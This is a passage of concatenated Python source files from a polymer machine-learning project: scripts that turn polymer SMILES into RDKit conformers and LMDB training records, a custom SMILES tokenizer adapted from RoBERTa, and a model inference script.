return MurckoScaffold.MurckoScaffoldSmiles(
smiles=smi, includeChirality=True)
except:
print("failed to generate scaffold with smiles: {}".format(smi))
return smi
def smi2_2Dcoords(smi):
mol = Chem.MolFromSmiles(smi)
mol = AllChem.AddHs(mol)
AllChem.Compute2DCoords(mol)
coordinates = mol.GetConformer().GetPositions().astype(np.float32)
    assert len(mol.GetAtoms()) == len(coordinates), "2D coordinates shape is not aligned with {}".format(smi)
return coordinates
def smi2_3Dcoords(smi,cnt):
mol = Chem.MolFromSmiles(smi)
mol = AllChem.AddHs(mol)
coordinate_list=[]
for seed in range(cnt):
try:
            res = AllChem.EmbedMolecule(mol, randomSeed=seed)  # randomSeed=-1 would generate a random conformer; a fixed seed keeps each conformer reproducible
if res == 0:
try:
                    AllChem.MMFFOptimizeMolecule(mol)  # some conformers cannot be optimized with MMFF
coordinates = mol.GetConformer().GetPositions()
except:
print("Failed to generate 3D, replace with 2D")
coordinates = smi2_2Dcoords(smi)
elif res == -1:
mol_tmp = Chem.MolFromSmiles(smi)
AllChem.EmbedMolecule(mol_tmp, maxAttempts=5000, randomSeed=seed)
mol_tmp = AllChem.AddHs(mol_tmp, addCoords=True)
try:
                    AllChem.MMFFOptimizeMolecule(mol_tmp)  # some conformers cannot be optimized with MMFF
coordinates = mol_tmp.GetConformer().GetPositions()
except:
print("Failed to generate 3D, replace with 2D")
coordinates = smi2_2Dcoords(smi)
except:
print("Failed to generate 3D, replace with 2D")
coordinates = smi2_2Dcoords(smi)
        assert len(mol.GetAtoms()) == len(coordinates), "3D coordinates shape is not aligned with {}".format(smi)
coordinate_list.append(coordinates.astype(np.float32))
return coordinate_list
def inner_smi2coords(content):
smi = content[0]
target = content[1]
mol = Chem.MolFromSmiles(smi)
atoms = [atom.GetSymbol() for atom in mol.GetAtoms()]
assert 'H' not in atoms
star_atoms_id = []
for idx, atom_symbol in enumerate(atoms):
if atom_symbol == '*':
star_atoms_id.append(idx)
assert len(star_atoms_id) == 2, "Error star num"
star_pair_list = []
for star_id in star_atoms_id:
star_pair_list.append(star_id)
star_atom = mol.GetAtomWithIdx(star_id)
neighbors = star_atom.GetNeighbors()
assert len(neighbors) == 1, "Error star neighbors num"
for neighbor in neighbors:
star_pair_list.append(neighbor.GetIdx())
pair_1_star = star_pair_list[0]
pair_1 = star_pair_list[3]
atom = mol.GetAtomWithIdx(pair_1_star)
atom.SetAtomicNum(mol.GetAtomWithIdx(pair_1).GetAtomicNum())
pair_2_star = star_pair_list[2]
pair_2 = star_pair_list[1]
atom = mol.GetAtomWithIdx(pair_2_star)
atom.SetAtomicNum(mol.GetAtomWithIdx(pair_2).GetAtomicNum())
smi = Chem.MolToSmiles(mol)
cnt = 10
scaffold = smi2scaffold(smi)
if len(mol.GetAtoms()) > 400:
coordinate_list = [smi2_2Dcoords(smi)] * (cnt+1)
print("atom num > 400, use 2D coords",smi)
else:
coordinate_list = smi2_3Dcoords(smi, cnt)
coordinate_list.append(smi2_2Dcoords(smi).astype(np.float32))
mol = Chem.MolFromSmiles(smi)
mol = AllChem.AddHs(mol)
atoms = [atom.GetSymbol() for atom in mol.GetAtoms()]
origin_smi = content[0]
origin_mol = Chem.MolFromSmiles(origin_smi)
origin_atoms = [atom.GetSymbol() for atom in origin_mol.GetAtoms()]
assert origin_atoms[pair_1_star] == '*'
assert origin_atoms[pair_2_star] == '*'
atoms[pair_1_star] = '*'
atoms[pair_2_star] = '*'
return {'atoms': atoms,
'coordinates': coordinate_list,
'mol':mol, 'smi': smi, 'origin_smi': content[0], 'star_pair': star_pair_list, 'scaffold': scaffold, 'target': target}
def smi2coords(content):
try:
return inner_smi2coords(content)
except:
print("failed psmiles: {}".format(content[0]))
return None
if __name__ == "__main__":
tokenizer = PolymerSmilesTokenizer.from_pretrained("../MMPolymer/models/roberta-base", max_len=411)
data_list = ["Egc", "Egb", "Eea", "Ei", "Xc", "EPS", "Nc", "Eat"]
for data_name in data_list:
save_path = f'./finetune_data/{data_name}'
os.makedirs(save_path, exist_ok=True)
content_list = []
with open(f'./data/{data_name}.csv', newline='', encoding='utf-8') as csvfile:
csvreader = csv.reader(csvfile)
headers = next(csvreader)
for row in csvreader:
if "*" not in row[0]:
continue
content_list.append(row)
env = lmdb.open(
os.path.join(save_path, f'{data_name}.lmdb'),
subdir=False,
readonly=False,
lock=False,
readahead=False,
meminit=False,
max_readers=1,
map_size=int(100e9),
)
txn = env.begin(write=True)
index = 0
for content in tqdm(content_list):
data_info = smi2coords(content)
            if data_info is None:
continue
encoding = tokenizer(
str(data_info['origin_smi']),
add_special_tokens=True,
max_length=411,
return_token_type_ids=False,
padding="max_length",
truncation=True,
return_attention_mask=True,
return_tensors='pt',
)
data_info["input_ids"] = encoding["input_ids"].flatten()
data_info["attention_mask"] = encoding["attention_mask"].flatten()
assert data_info["input_ids"].shape[0] == 411
assert data_info["attention_mask"].shape[0] == 411
txn.put(f'{index}'.encode("ascii"), pickle.dumps(data_info, protocol=-1))
index += 1
txn.commit()
env.close()
print(f'finetune_data_{data_name}, total_num:{index}')
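# Reading a written record back (illustrative sketch; `data_name` is one of the properties above):
#
# env = lmdb.open(f'./finetune_data/{data_name}/{data_name}.lmdb', subdir=False, readonly=True, lock=False)
# with env.begin() as txn:
#     sample = pickle.loads(txn.get('0'.encode("ascii")))
# # sample holds: atoms, coordinates (11 conformers), input_ids / attention_mask (length 411),
# # star_pair, scaffold, and the regression target.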
| 24,630 | Python | .py | 513 | 37.990253 | 189 | 0.613556 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,129 | pretrain_data_process.py | FanmengWang_MMPolymer/dataset/pretrain_data_process.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import os
import sys
import csv
import shutil
import pickle
import lmdb
import subprocess
import torch
import argparse
import pandas as pd
import numpy as np
from rdkit import Chem
from tqdm import tqdm
from rdkit import RDLogger
from rdkit.Chem import AllChem
from rdkit.Chem.Scaffolds import MurckoScaffold
import warnings
warnings.filterwarnings(action='ignore')
from multiprocessing import Pool
import json
import os
from functools import lru_cache
from typing import List, Optional, Tuple
import regex as re
from transformers import AddedToken, PreTrainedTokenizer
import logging
from transformers import RobertaTokenizer
logger = logging.getLogger(__name__)
VOCAB_FILES_NAMES = {
"vocab_file": "vocab.json",
"merges_file": "merges.txt",
}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"roberta-base": "https://huggingface.co/roberta-base/resolve/main/vocab.json",
"roberta-large": "https://huggingface.co/roberta-large/resolve/main/vocab.json",
"roberta-large-mnli": "https://huggingface.co/roberta-large-mnli/resolve/main/vocab.json",
"distilroberta-base": "https://huggingface.co/distilroberta-base/resolve/main/vocab.json",
"roberta-base-openai-detector": "https://huggingface.co/roberta-base-openai-detector/resolve/main/vocab.json",
"roberta-large-openai-detector": "https://huggingface.co/roberta-large-openai-detector/resolve/main/vocab.json",
},
"merges_file": {
"roberta-base": "https://huggingface.co/roberta-base/resolve/main/merges.txt",
"roberta-large": "https://huggingface.co/roberta-large/resolve/main/merges.txt",
"roberta-large-mnli": "https://huggingface.co/roberta-large-mnli/resolve/main/merges.txt",
"distilroberta-base": "https://huggingface.co/distilroberta-base/resolve/main/merges.txt",
"roberta-base-openai-detector": "https://huggingface.co/roberta-base-openai-detector/resolve/main/merges.txt",
"roberta-large-openai-detector": "https://huggingface.co/roberta-large-openai-detector/resolve/main/merges.txt",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"roberta-base": 512,
"roberta-large": 512,
"roberta-large-mnli": 512,
"distilroberta-base": 512,
"roberta-base-openai-detector": 512,
"roberta-large-openai-detector": 512,
}
@lru_cache()
def bytes_to_unicode():
"""
    Returns a list of utf-8 bytes and a mapping to unicode strings. We specifically avoid mapping to whitespace/control
characters the bpe code barfs on.
The reversible bpe codes work on unicode strings. This means you need a large # of unicode characters in your vocab
if you want to avoid UNKs. When you're at something like a 10B token dataset you end up needing around 5K for
decent coverage. This is a significant percentage of your normal, say, 32K bpe vocab. To avoid that, we want lookup
tables between utf-8 bytes and unicode strings.
"""
bs = (
list(range(ord("!"), ord("~") + 1)) + list(range(ord("¡"), ord("¬") + 1)) + list(range(ord("®"), ord("ÿ") + 1))
)
cs = bs[:]
n = 0
for b in range(2**8):
if b not in bs:
bs.append(b)
cs.append(2**8 + n)
n += 1
cs = [chr(n) for n in cs]
return dict(zip(bs, cs))
def get_pairs(word):
"""
Return set of symbol pairs in a word.
Word is represented as tuple of symbols (symbols being variable-length strings).
"""
pairs = set()
prev_char = word[0]
for char in word[1:]:
pairs.add((prev_char, char))
prev_char = char
return pairs
class PolymerSmilesTokenizer(PreTrainedTokenizer):
"""Adapt Roberta Tokenizer to PolymerSmilesTokenzier"""
"""
Original Comments:
Constructs a RoBERTa tokenizer, derived from the GPT-2 tokenizer, using byte-level Byte-Pair-Encoding.
This tokenizer has been trained to treat spaces like parts of the tokens (a bit like sentencepiece) so a word will
be encoded differently whether it is at the beginning of the sentence (without space) or not:
```
#>>> from transformers import RobertaTokenizer
#>>> tokenizer = RobertaTokenizer.from_pretrained("roberta-base")
#>>> tokenizer("Hello world")['input_ids']
[0, 31414, 232, 328, 2]
#>>> tokenizer(" Hello world")['input_ids']
[0, 20920, 232, 2]
```
You can get around that behavior by passing `add_prefix_space=True` when instantiating this tokenizer or when you
call it on some text, but since the model was not pretrained this way, it might yield a decrease in performance.
<Tip>
When used with `is_split_into_words=True`, this tokenizer will add a space before each word (even the first one).
</Tip>
This tokenizer inherits from [`PreTrainedTokenizer`] which contains most of the main methods. Users should refer to
this superclass for more information regarding those methods.
Args:
vocab_file (`str`):
Path to the vocabulary file.
merges_file (`str`):
Path to the merges file.
errors (`str`, *optional*, defaults to `"replace"`):
Paradigm to follow when decoding bytes to UTF-8. See
[bytes.decode](https://docs.python.org/3/library/stdtypes.html#bytes.decode) for more information.
bos_token (`str`, *optional*, defaults to `"<s>"`):
            The beginning of sequence token that was used during pretraining. Can be used as a sequence classifier token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the beginning of
sequence. The token used is the `cls_token`.
</Tip>
eos_token (`str`, *optional*, defaults to `"</s>"`):
The end of sequence token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the end of sequence.
The token used is the `sep_token`.
</Tip>
sep_token (`str`, *optional*, defaults to `"</s>"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
cls_token (`str`, *optional*, defaults to `"<s>"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
unk_token (`str`, *optional*, defaults to `"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
pad_token (`str`, *optional*, defaults to `"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
mask_token (`str`, *optional*, defaults to `"<mask>"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
add_prefix_space (`bool`, *optional*, defaults to `False`):
            Whether or not to add an initial space to the input. This allows treating the leading word just as any
            other word. (The RoBERTa tokenizer detects the beginning of words by the preceding space.)
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
model_input_names = ["input_ids", "attention_mask"]
def __init__(
self,
vocab_file,
merges_file,
errors="replace",
bos_token="<s>",
eos_token="</s>",
sep_token="</s>",
cls_token="<s>",
unk_token="<unk>",
pad_token="<pad>",
mask_token="<mask>",
add_prefix_space=False,
**kwargs
):
bos_token = AddedToken(bos_token, lstrip=False, rstrip=False) if isinstance(bos_token, str) else bos_token
eos_token = AddedToken(eos_token, lstrip=False, rstrip=False) if isinstance(eos_token, str) else eos_token
sep_token = AddedToken(sep_token, lstrip=False, rstrip=False) if isinstance(sep_token, str) else sep_token
cls_token = AddedToken(cls_token, lstrip=False, rstrip=False) if isinstance(cls_token, str) else cls_token
unk_token = AddedToken(unk_token, lstrip=False, rstrip=False) if isinstance(unk_token, str) else unk_token
pad_token = AddedToken(pad_token, lstrip=False, rstrip=False) if isinstance(pad_token, str) else pad_token
# Mask token behave like a normal word, i.e. include the space before it
mask_token = AddedToken(mask_token, lstrip=True, rstrip=False) if isinstance(mask_token, str) else mask_token
super().__init__(
errors=errors,
bos_token=bos_token,
eos_token=eos_token,
unk_token=unk_token,
sep_token=sep_token,
cls_token=cls_token,
pad_token=pad_token,
mask_token=mask_token,
add_prefix_space=add_prefix_space,
**kwargs,
)
with open(vocab_file, encoding="utf-8") as vocab_handle:
self.encoder = json.load(vocab_handle)
self.decoder = {v: k for k, v in self.encoder.items()}
self.errors = errors # how to handle errors in decoding
self.byte_encoder = bytes_to_unicode()
self.byte_decoder = {v: k for k, v in self.byte_encoder.items()}
with open(merges_file, encoding="utf-8") as merges_handle:
bpe_merges = merges_handle.read().split("\n")[1:-1]
bpe_merges = [tuple(merge.split()) for merge in bpe_merges]
self.bpe_ranks = dict(zip(bpe_merges, range(len(bpe_merges))))
self.cache = {}
self.add_prefix_space = add_prefix_space
# Should have added re.IGNORECASE so BPE merges can happen for capitalized versions of contractions
"""Regex for SMILES"""
smi_regex_pattern = r"(\-?[0-9]+\.?[0-9]*|\[|\]|SELF|Li|Be|Na|Mg|Al|K|Ca|Co|Zn|Ga|Ge|As|Se|Sn|Te|N|O|P|H|I|b|c|n|o|s|p|Br?|Cl?|Fe?|Ni?|Si?|\||\(|\)|\^|=|#|-|\+|\\|\/|@|\*|\.|\%|\$)"
self.pat = re.compile(smi_regex_pattern)
@property
def vocab_size(self):
return len(self.encoder)
def get_vocab(self):
return dict(self.encoder, **self.added_tokens_encoder)
def bpe(self, token):
if token in self.cache:
return self.cache[token]
word = tuple(token)
pairs = get_pairs(word)
if not pairs:
return token
while True:
bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float("inf")))
if bigram not in self.bpe_ranks:
break
first, second = bigram
new_word = []
i = 0
while i < len(word):
try:
j = word.index(first, i)
except ValueError:
new_word.extend(word[i:])
break
else:
new_word.extend(word[i:j])
i = j
if word[i] == first and i < len(word) - 1 and word[i + 1] == second:
new_word.append(first + second)
i += 2
else:
new_word.append(word[i])
i += 1
new_word = tuple(new_word)
word = new_word
if len(word) == 1:
break
else:
pairs = get_pairs(word)
word = " ".join(word)
self.cache[token] = word
return word
def _tokenize(self, text):
"""Tokenize a string."""
bpe_tokens = []
for token in re.findall(self.pat, text):
token = "".join(
self.byte_encoder[b] for b in token.encode("utf-8")
) # Maps all our bytes to unicode strings, avoiding control tokens of the BPE (spaces in our case)
bpe_tokens.extend(bpe_token for bpe_token in self.bpe(token).split(" "))
return bpe_tokens
def _convert_token_to_id(self, token):
"""Converts a token (str) in an id using the vocab."""
return self.encoder.get(token, self.encoder.get(self.unk_token))
def _convert_id_to_token(self, index):
"""Converts an index (integer) in a token (str) using the vocab."""
return self.decoder.get(index)
def convert_tokens_to_string(self, tokens):
"""Converts a sequence of tokens (string) in a single string."""
text = "".join(tokens)
text = bytearray([self.byte_decoder[c] for c in text]).decode("utf-8", errors=self.errors)
return text
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
if not os.path.isdir(save_directory):
logger.error(f"Vocabulary path ({save_directory}) should be a directory")
return
vocab_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"]
)
merge_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["merges_file"]
)
with open(vocab_file, "w", encoding="utf-8") as f:
f.write(json.dumps(self.encoder, ensure_ascii=False))
index = 0
with open(merge_file, "w", encoding="utf-8") as writer:
writer.write("#version: 0.2\n")
for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning(
f"Saving vocabulary to {merge_file}: BPE merge indices are not consecutive."
" Please check that the tokenizer is not corrupted!"
)
index = token_index
writer.write(" ".join(bpe_tokens) + "\n")
index += 1
return vocab_file, merge_file
def build_inputs_with_special_tokens(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. A RoBERTa sequence has the following format:
- single sequence: `<s> X </s>`
- pair of sequences: `<s> A </s></s> B </s>`
Args:
token_ids_0 (`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens.
"""
if token_ids_1 is None:
return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
cls = [self.cls_token_id]
sep = [self.sep_token_id]
return cls + token_ids_0 + sep + sep + token_ids_1 + sep
def get_special_tokens_mask(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
) -> List[int]:
"""
Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer `prepare_for_model` method.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
already_has_special_tokens (`bool`, *optional*, defaults to `False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
return super().get_special_tokens_mask(
token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
)
if token_ids_1 is None:
return [1] + ([0] * len(token_ids_0)) + [1]
return [1] + ([0] * len(token_ids_0)) + [1, 1] + ([0] * len(token_ids_1)) + [1]
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task. RoBERTa does not
make use of token type ids, therefore a list of zeros is returned.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of zeros.
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep + sep + token_ids_1 + sep) * [0]
def prepare_for_tokenization(self, text, is_split_into_words=False, **kwargs):
add_prefix_space = kwargs.pop("add_prefix_space", self.add_prefix_space)
if (is_split_into_words or add_prefix_space) and (len(text) > 0 and not text[0].isspace()):
text = " " + text
return (text, kwargs)
def smi2scaffold(smi):
try:
return MurckoScaffold.MurckoScaffoldSmiles(
smiles=smi, includeChirality=True)
except:
print("failed to generate scaffold with smiles: {}".format(smi))
return smi
def smi2_2Dcoords(smi):
mol = Chem.MolFromSmiles(smi)
mol = AllChem.AddHs(mol)
AllChem.Compute2DCoords(mol)
coordinates = mol.GetConformer().GetPositions().astype(np.float32)
    assert len(mol.GetAtoms()) == len(coordinates), "2D coordinates shape is not aligned with {}".format(smi)
return coordinates
def smi2_3Dcoords(smi,cnt):
mol = Chem.MolFromSmiles(smi)
mol = AllChem.AddHs(mol)
coordinate_list=[]
for seed in range(cnt):
try:
            res = AllChem.EmbedMolecule(mol, randomSeed=seed)  # randomSeed=-1 would give a random conformer; a fixed seed keeps the embedding reproducible
if res == 0:
try:
                    AllChem.MMFFOptimizeMolecule(mol)  # some conformers cannot be optimized with MMFF
coordinates = mol.GetConformer().GetPositions()
except:
print("Failed to generate 3D, replace with 2D")
coordinates = smi2_2Dcoords(smi)
elif res == -1:
mol_tmp = Chem.MolFromSmiles(smi)
AllChem.EmbedMolecule(mol_tmp, maxAttempts=5000, randomSeed=seed)
mol_tmp = AllChem.AddHs(mol_tmp, addCoords=True)
try:
                    AllChem.MMFFOptimizeMolecule(mol_tmp)  # some conformers cannot be optimized with MMFF
coordinates = mol_tmp.GetConformer().GetPositions()
except:
print("Failed to generate 3D, replace with 2D")
coordinates = smi2_2Dcoords(smi)
except:
print("Failed to generate 3D, replace with 2D")
coordinates = smi2_2Dcoords(smi)
        assert len(mol.GetAtoms()) == len(coordinates), "3D coordinates shape is not aligned with {}".format(smi)
coordinate_list.append(coordinates.astype(np.float32))
return coordinate_list
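# Illustrative usage (sketch; assumes RDKit is available, input SMILES is hypothetical):
#   coord_list = smi2_3Dcoords("CCO", cnt=2)
#   -> list of 2 float32 arrays of shape (num_atoms_incl_H, 3); failed embeddings fall back to 2D coordinates.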
def inner_smi2coords(content):
smi = content[0]
mol = Chem.MolFromSmiles(smi)
atoms = [atom.GetSymbol() for atom in mol.GetAtoms()]
assert 'H' not in atoms
star_atoms_id = []
for idx, atom_symbol in enumerate(atoms):
if atom_symbol == '*':
star_atoms_id.append(idx)
    assert len(star_atoms_id) == 2, "expected exactly two '*' atoms in the p-SMILES"
star_pair_list = []
for star_id in star_atoms_id:
star_pair_list.append(star_id)
star_atom = mol.GetAtomWithIdx(star_id)
neighbors = star_atom.GetNeighbors()
        assert len(neighbors) == 1, "each '*' atom should have exactly one neighbor"
for neighbor in neighbors:
star_pair_list.append(neighbor.GetIdx())
pair_1_star = star_pair_list[0]
pair_1 = star_pair_list[3]
atom = mol.GetAtomWithIdx(pair_1_star)
atom.SetAtomicNum(mol.GetAtomWithIdx(pair_1).GetAtomicNum())
pair_2_star = star_pair_list[2]
pair_2 = star_pair_list[1]
atom = mol.GetAtomWithIdx(pair_2_star)
atom.SetAtomicNum(mol.GetAtomWithIdx(pair_2).GetAtomicNum())
smi = Chem.MolToSmiles(mol)
cnt = 10
scaffold = smi2scaffold(smi)
if len(mol.GetAtoms()) > 400:
coordinate_list = [smi2_2Dcoords(smi)] * (cnt+1)
print("atom num > 400, use 2D coords",smi)
else:
coordinate_list = smi2_3Dcoords(smi, cnt)
coordinate_list.append(smi2_2Dcoords(smi).astype(np.float32))
mol = Chem.MolFromSmiles(smi)
mol = AllChem.AddHs(mol)
atoms = [atom.GetSymbol() for atom in mol.GetAtoms()]
origin_smi = content[0]
origin_mol = Chem.MolFromSmiles(origin_smi)
origin_atoms = [atom.GetSymbol() for atom in origin_mol.GetAtoms()]
assert origin_atoms[pair_1_star] == '*'
assert origin_atoms[pair_2_star] == '*'
atoms[pair_1_star] = '*'
atoms[pair_2_star] = '*'
return {'atoms': atoms,
'coordinates': coordinate_list,
'mol':mol, 'smi': smi, 'origin_smi': content[0], 'star_pair': star_pair_list, 'scaffold': scaffold}
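# Worked example (hypothetical p-SMILES): for "*CC*", atoms = ['*', 'C', 'C', '*'] and
# star_pair_list = [0, 1, 3, 2]. Each '*' is assigned the atomic number of the atom bonded to the
# other '*' (both C here), so conformers are generated for the capped SMILES "CCCC", while the
# returned 'atoms' list restores '*' at the original star positions.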
def smi2coords(content):
try:
return inner_smi2coords(content)
except:
print("failed psmiles: {}".format(content[0]))
return None
if __name__ == "__main__":
tokenizer = PolymerSmilesTokenizer.from_pretrained("../MMPolymer/models/roberta-base", max_len=411)
save_path = f'./pretrain_data/'
os.makedirs(save_path, exist_ok=True)
content_list = []
with open(f'./data/PI1M.csv', newline='', encoding='utf-8') as csvfile:
csvreader = csv.reader(csvfile)
headers = next(csvreader)
for row in csvreader:
if "*" not in row[0]:
continue
content_list.append(row)
env = lmdb.open(
os.path.join(save_path, 'PI1M.lmdb'),
subdir=False,
readonly=False,
lock=False,
readahead=False,
meminit=False,
max_readers=1,
map_size=int(100e9),
)
txn = env.begin(write=True)
    # pretraining data processing: compute conformers, tokenize each p-SMILES, and store everything in the LMDB
index = 0
for content in tqdm(content_list):
data_info = smi2coords(content)
        if data_info is None:
continue
encoding = tokenizer(
str(data_info['origin_smi']),
add_special_tokens=True,
max_length=411,
return_token_type_ids=False,
padding="max_length",
truncation=True,
return_attention_mask=True,
return_tensors='pt',
)
data_info["input_ids"] = encoding["input_ids"].flatten()
data_info["attention_mask"] = encoding["attention_mask"].flatten()
assert data_info["input_ids"].shape[0] == 411
assert data_info["attention_mask"].shape[0] == 411
txn.put(f'{index}'.encode("ascii"), pickle.dumps(data_info, protocol=-1))
index += 1
txn.commit()
env.close()
print(f'pretrain_data, total_num:{index}')
| 24,264 | Python | .py | 511 | 37.857143 | 189 | 0.618739 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,130 | infer.py | FanmengWang_MMPolymer/MMPolymer/infer.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import logging
import os
import sys
import pickle
import torch
from unicore import checkpoint_utils, distributed_utils, options, utils
from unicore.logging import progress_bar
from unicore import tasks
logging.basicConfig(
format="%(asctime)s | %(levelname)s | %(name)s | %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=os.environ.get("LOGLEVEL", "INFO").upper(),
stream=sys.stdout,
)
logger = logging.getLogger("MMPolymer.inference")
def main(args):
assert (
args.batch_size is not None
), "Must specify batch size either with --batch-size"
use_fp16 = args.fp16
use_cuda = torch.cuda.is_available() and not args.cpu
if use_cuda:
torch.cuda.set_device(args.device_id)
if args.distributed_world_size > 1:
data_parallel_world_size = distributed_utils.get_data_parallel_world_size()
data_parallel_rank = distributed_utils.get_data_parallel_rank()
else:
data_parallel_world_size = 1
data_parallel_rank = 0
# Load model
logger.info("loading model(s) from {}".format(args.path))
state = checkpoint_utils.load_checkpoint_to_cpu(args.path)
task = tasks.setup_task(args)
model = task.build_model(args)
model.load_state_dict(state["model"], strict=False)
# Move models to GPU
if use_fp16:
model.half()
if use_cuda:
model.cuda()
# Print args
logger.info(args)
# Build loss
loss = task.build_loss(args)
loss.eval()
for subset in args.valid_subset.split(","):
try:
task.load_dataset(subset, combine=False, epoch=1)
dataset = task.dataset(subset)
except KeyError:
raise Exception("Cannot find dataset: " + subset)
if not os.path.exists(args.results_path):
os.makedirs(args.results_path)
fname = (args.path).split("/")[-2]
save_path = os.path.join(args.results_path, fname + "_" + subset + ".out.pkl")
save_cpu_path = os.path.join(args.results_path, fname + "_" + subset + "_cpu" +".out.pkl")
# Initialize data iterator
itr = task.get_batch_iterator(
dataset=dataset,
batch_size=args.batch_size,
ignore_invalid_inputs=True,
required_batch_size_multiple=args.required_batch_size_multiple,
seed=args.seed,
num_shards=data_parallel_world_size,
shard_id=data_parallel_rank,
num_workers=args.num_workers,
data_buffer_size=args.data_buffer_size,
).next_epoch_itr(shuffle=False)
progress = progress_bar.progress_bar(
itr,
log_format=args.log_format,
log_interval=args.log_interval,
prefix=f"valid on '{subset}' subset",
default_log_format=("tqdm" if not args.no_progress_bar else "simple"),
)
log_outputs = []
for i, sample in enumerate(progress):
sample = utils.move_to_cuda(sample) if use_cuda else sample
if len(sample) == 0:
continue
_, _, log_output = task.valid_step(sample, model, loss, test=True)
progress.log({}, step=i)
log_outputs.append(log_output)
print(len(log_outputs))
        # move the results from CUDA to CPU so they can be post-processed in parallel later
log_outputs_cpu = log_outputs
for i in range(len(log_outputs_cpu)):
for key in log_outputs_cpu[i]:
try:
log_outputs_cpu[i][key] = log_outputs_cpu[i][key].cpu()
except:
pass
pickle.dump(log_outputs_cpu, open(save_cpu_path, "wb"))
pickle.dump(log_outputs, open(save_path, "wb"))
logger.info("Done inference! ")
return None
def cli_main():
parser = options.get_validation_parser()
options.add_model_args(parser)
args = options.parse_args_and_arch(parser)
distributed_utils.call_main(args, main)
if __name__ == "__main__":
cli_main()
| 4,182 | Python | .py | 105 | 30.914286 | 98 | 0.623301 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,131 | __init__.py | FanmengWang_MMPolymer/MMPolymer/__init__.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import importlib
import MMPolymer.tasks
import MMPolymer.data
import MMPolymer.models
import MMPolymer.losses
| 240 | Python | .py | 7 | 33 | 69 | 0.844156 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,132 | data_utils.py | FanmengWang_MMPolymer/MMPolymer/data/data_utils.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
import contextlib
@contextlib.contextmanager
def numpy_seed(seed, *addl_seeds):
"""Context manager which seeds the NumPy PRNG with the specified seed and
restores the state afterward"""
if seed is None:
yield
return
if len(addl_seeds) > 0:
seed = int(hash((seed, *addl_seeds)) % 1e6)
state = np.random.get_state()
np.random.seed(seed)
try:
yield
finally:
np.random.set_state(state)
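# Illustrative usage (sketch):
#   with numpy_seed(1, epoch, index):
#       idx = np.random.randint(10)  # reproducible for a given (seed, epoch, index)
#   # the previous global NumPy RNG state is restored on exit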
| 604 | Python | .py | 19 | 26.842105 | 77 | 0.689003 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,133 | prepend_and_append_2d_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/prepend_and_append_2d_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import torch
from functools import lru_cache
from unicore.data import BaseWrapperDataset
class PrependAndAppend2DDataset(BaseWrapperDataset):
def __init__(self, dataset, token=None):
super().__init__(dataset)
self.token = token
@lru_cache(maxsize=16)
def __getitem__(self, idx):
item = self.dataset[idx]
if self.token is not None:
h, w = item.size(-2), item.size(-1)
